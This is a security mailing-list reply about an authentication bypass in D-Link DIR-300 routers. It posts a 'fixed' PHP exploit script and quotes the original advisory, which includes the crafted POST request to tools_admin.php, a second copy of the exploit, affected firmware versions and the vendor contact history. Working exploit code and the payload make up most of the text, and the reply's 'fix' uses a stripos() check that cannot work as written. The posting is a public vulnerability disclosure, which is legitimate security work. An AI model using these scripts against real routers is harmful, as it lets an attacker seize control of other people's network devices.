[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: D-Link DIR-300 authentication bypass



On some versions of the firmware, exploit says that "something goes
wrong" despite of password change is successfull. There is a fixed
version:

---cut here---
<?php
if(sizeof($argv)!=4) {
   echo "Usage: php5 $argv[0] <router ip addres> <port>
   <admin password>\n";
   exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php";);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,
CURLOPT_POSTFIELDS,"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));
echo "+ starting request\n";
$out = curl_exec($ch);
if($out===false) {
   echo "- Error: could not connect (
   http://$argv[1]:$argv[2]/tools_admin.php).\n";
   exit;
} else
echo "+ request sended\n";
curl_close($ch);
if(stripos($out,"login.php")===true) {
   echo "- something goes wrong (check answer - answer.html) !\n";
   $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
   exit;
}
else
   echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>
---cut here---

W dniu 9 listopada 2010 10:05 uÅytkownik Karol CeliÅski
<karol@xxxxxxxx> napisaÅ:
> [intro]
> Hello, I found security bug in D-Link DIR-300 wireless router. It can
> be used to bypass authentication mechanizm by attacker with access to
> web interface. I reported it to D-Link but they are not replying for
> my emails. According to other D-Link security holes and their status I
> think that they won't reply, so I decided to write about it here.
>
> [Technical details]
>
> Control panel script - tools_admin.php allows attacker to change
> administrator name, password and other variables without any
> authorization by sending specially crafted http post request such as:
>
> ---cut here---
> POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
> Host: 192.168.1.2
> Keep-Alive: 115
> Content-Type: application/x-www-form-urlencoded
> Content-length: 0
>
> ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
> ---cut here---
>
> If attacker makes this request to the control panel, the
> administrator username is set to admin with password ,,uhOHahEh".
>
> [Affected]
>
> - All known D-Link DIR-300 firmware (ie. 2.01B1, 1.04, 1.05).
> - There is possibility that other dlink devices which use the same php
> scripts in control panel are affected. I'm not able to check it
> because I don't have devices for tests. I'm counting on you ;->
>
> [Code]
>
> ---cut here---
> <?php
> Â Â Â Âif(sizeof($argv)!=4) {
> Â Â Â Â Â Â Â Âecho "Usage: php5 $argv[0] <router ip addres> <port>
> <admin password>\n";
> Â Â Â Â Â Â Â Âexit;
> Â Â Â Â}
> Â Â Â Â$ch=curl_init();
> Â Â Â Âcurl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php";);
> Â Â Â Âcurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
> Â Â Â Âcurl_setopt($ch, CURLOPT_PORT, $argv[2]);
> Â Â Â Âcurl_setopt($ch, CURLOPT_POST, 1);
> Â Â Â Âcurl_setopt($ch, CURLOPT_POSTFIELDS,
> "ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));
> Â Â Â Âecho "+ starting request\n";
> Â Â Â Â$out = curl_exec($ch);
> Â Â Â Âif($out===false) {
> Â Â Â Â Â Â Â Âecho "- Error: could not connect (
> http://$argv[1]:$argv[2]/tools_admin.php).\n";
> Â Â Â Â Â Â Â Âexit;
> Â Â Â Â} else
> Â Â Â Â Â Â Â Âecho "+ request sended\n";
> Â Â Â Âcurl_close($ch);
> Â Â Â Âif(stripos($out,"Successfully")===false) {
> Â Â Â Â Â Â Â Âecho "- something goes wrong (check answer - answer.html) !\n";
> Â Â Â Â Â Â Â Â$f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
> Â Â Â Â Â Â Â Âexit;
> Â Â Â Â}
> Â Â Â Âelse
> Â Â Â Â Â Â Â Âecho "+ ok, now you can login using l: admin p:$argv[3]\n";
> ?>
> ---cut here---
>
> [History]
>
> Â- Information sent to vendor 07.08.2010
> Â- No response
> Â- Information resended to vendor 07.31.2010
> Â- No response from vendor
>
>
> [Credits]
> Karol CeliÅski ( Celin )
> Pentester/Researcher @ Safe Computing
>
> [Contact]
>
> karol at celin dot pl
>
> [Greetz]
> Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski,
> Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing
> members.
>